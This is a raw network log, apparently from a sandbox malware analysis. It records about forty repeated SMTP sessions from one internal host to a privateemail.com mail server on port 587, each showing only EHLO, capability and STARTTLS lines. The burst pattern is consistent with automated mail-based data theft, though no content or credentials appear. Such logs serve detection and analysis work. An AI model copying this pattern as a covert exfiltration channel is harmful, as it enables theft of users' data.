                                                                                                  Feb 2, 2021 08:52:47.812969923 CET58749760199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:47.813316107 CET49760587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:48.015526056 CET58749760199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:48.015924931 CET49760587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:48.031583071 CET58749761199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:48.031898022 CET49761587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:48.217470884 CET58749760199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:48.222242117 CET58749761199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:48.225008965 CET49761587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:48.414846897 CET58749761199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:50.819664001 CET58749762199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:50.819951057 CET49762587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:51.013494968 CET58749762199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:51.015211105 CET49762587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:51.091154099 CET58749763199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:51.091501951 CET49763587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:51.207123995 CET58749762199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:51.282040119 CET58749763199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:51.282620907 CET49763587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:51.472697020 CET58749763199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:53.700566053 CET58749764199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:53.700826883 CET49764587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:53.891614914 CET58749764199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:53.891880035 CET49764587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:54.082276106 CET58749764199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:56.752723932 CET58749765199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:56.753062010 CET49765587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:56.944964886 CET58749765199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:56.945434093 CET49765587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:52:57.136822939 CET58749765199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:52:59.741539001 CET58749767199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:59.744452953 CET49767587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:59.900674105 CET58749768199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:52:59.916116953 CET49768587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:52:59.948602915 CET58749767199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:52:59.948976994 CET49767587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:53:00.122152090 CET58749768199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:53:00.122442961 CET49768587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:53:00.152375937 CET58749767199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:53:00.325570107 CET58749768199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:53:02.618752956 CET58749770199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:53:02.619087934 CET49770587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:53:02.809268951 CET58749770199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:53:02.815468073 CET49770587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:53:03.005538940 CET58749770199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:53:06.514214993 CET58749771199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:53:06.514597893 CET49771587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:53:06.704798937 CET58749771199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:53:06.705087900 CET49771587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:53:06.894906998 CET58749771199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:53:09.670850992 CET58749772199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:53:09.671189070 CET49772587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:53:09.863631010 CET58749772199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:53:09.863991976 CET49772587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:53:10.054274082 CET58749772199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:53:18.489265919 CET58749774199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:53:18.489636898 CET49774587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:53:18.680254936 CET58749774199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:53:18.680546045 CET49774587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:53:18.870492935 CET58749774199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:53:21.223431110 CET58749775199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:53:21.350620031 CET49775587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:53:21.541002035 CET58749775199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:53:21.541326046 CET49775587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:53:21.733660936 CET58749775199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:53:24.606659889 CET58749776199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:53:24.607726097 CET49776587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:53:24.811074972 CET58749776199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:53:24.811362028 CET49776587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:53:25.012739897 CET58749776199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:53:27.989326000 CET58749778199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:53:27.989716053 CET49778587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:53:28.180408955 CET58749778199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:53:28.180705070 CET49778587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:53:28.373656034 CET58749778199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:53:35.901496887 CET58749780199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:53:35.901990891 CET49780587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:53:36.096594095 CET58749780199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:53:36.097197056 CET49780587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:53:36.239164114 CET58749782199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:53:36.239751101 CET58749781199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:53:36.284514904 CET49782587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:53:36.284563065 CET49781587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:53:36.289796114 CET58749780199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:53:36.486347914 CET58749781199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:53:36.486578941 CET58749782199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:53:36.486627102 CET49781587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:53:36.486783028 CET49782587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:53:36.687962055 CET58749781199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:53:36.688091993 CET58749782199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:53:38.683794975 CET58749783199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:53:38.684241056 CET49783587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:53:38.877027988 CET58749783199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:53:38.877393961 CET49783587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:53:39.067572117 CET58749783199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:53:42.474970102 CET58749784199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:53:42.475333929 CET49784587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:53:42.666105986 CET58749784199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:53:42.666457891 CET49784587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:53:42.856486082 CET58749784199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:53:45.580559969 CET58749786199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:53:45.580796957 CET49786587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:53:45.782514095 CET58749786199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:53:45.782795906 CET49786587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:53:45.984117031 CET58749786199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:13.248991013 CET58749790199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:13.249319077 CET49790587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:13.451119900 CET58749790199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:13.451430082 CET49790587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:13.652879000 CET58749790199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:16.356473923 CET58749792199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:16.359440088 CET49792587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:16.551491976 CET58749792199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:16.554924011 CET49792587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:16.747075081 CET58749792199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:19.546262026 CET58749793199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:19.546660900 CET49793587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:19.748264074 CET58749793199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:19.748622894 CET49793587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:19.949882030 CET58749793199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:22.712263107 CET58749794199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:22.712584019 CET49794587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:22.903280020 CET58749794199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:22.903708935 CET49794587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:23.094129086 CET58749794199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:24.265650034 CET58749795199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:24.266120911 CET49795587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:24.456612110 CET58749795199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:24.456887007 CET49795587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:24.646842957 CET58749795199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:33.747540951 CET58749796199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:33.748317003 CET49796587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:33.940007925 CET58749796199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:33.940270901 CET49796587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:34.130645990 CET58749796199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:36.648380041 CET58749797199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:36.648818016 CET49797587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:36.677932024 CET58749798199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:36.682199955 CET49798587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:36.841758013 CET58749797199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:36.841996908 CET49797587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:36.872733116 CET58749798199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:36.876977921 CET49798587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:37.033971071 CET58749797199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:37.067073107 CET58749798199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:39.379169941 CET58749799199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:39.381690979 CET49799587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:39.572385073 CET58749799199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:39.574527025 CET49799587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:39.766592979 CET58749799199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:41.156644106 CET58749800199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:41.169212103 CET49800587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:41.359941006 CET58749800199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:41.360233068 CET49800587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:41.553025961 CET58749800199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:42.419593096 CET58749801199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:42.420350075 CET49801587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:42.611356974 CET58749801199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:42.611753941 CET49801587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:42.805545092 CET58749801199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:44.273689032 CET58749802199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:44.273976088 CET49802587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:44.478375912 CET58749802199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:44.478852987 CET49802587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:44.680263996 CET58749802199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:49.376130104 CET58749803199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:49.376744032 CET49803587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:49.568742037 CET58749803199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:49.571069002 CET49803587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:49.761332035 CET58749803199.193.7.228192.168.2.7220 Ready to start TLS
                                                                                                  Feb 2, 2021 08:54:52.260323048 CET58749804199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:52.260835886 CET49804587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:52.267551899 CET58749805199.193.7.228192.168.2.7220 PrivateEmail.com prod Mail Node
                                                                                                  Feb 2, 2021 08:54:52.269411087 CET49805587192.168.2.7199.193.7.228EHLO 830021
                                                                                                  Feb 2, 2021 08:54:52.452074051 CET58749804199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:52.452435970 CET49804587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:52.460019112 CET58749805199.193.7.228192.168.2.7250-mta-13.privateemail.com
                                                                                                  250-PIPELINING
                                                                                                  250-SIZE 81788928
                                                                                                  250-ETRN
                                                                                                  250-AUTH PLAIN LOGIN
                                                                                                  250-ENHANCEDSTATUSCODES
                                                                                                  250-8BITMIME
                                                                                                  250 STARTTLS
                                                                                                  Feb 2, 2021 08:54:52.460841894 CET49805587192.168.2.7199.193.7.228STARTTLS
                                                                                                  Feb 2, 2021 08:54:52.644531012 CET58749804199.193.7.228192.168.2.7220 Ready to start TLS
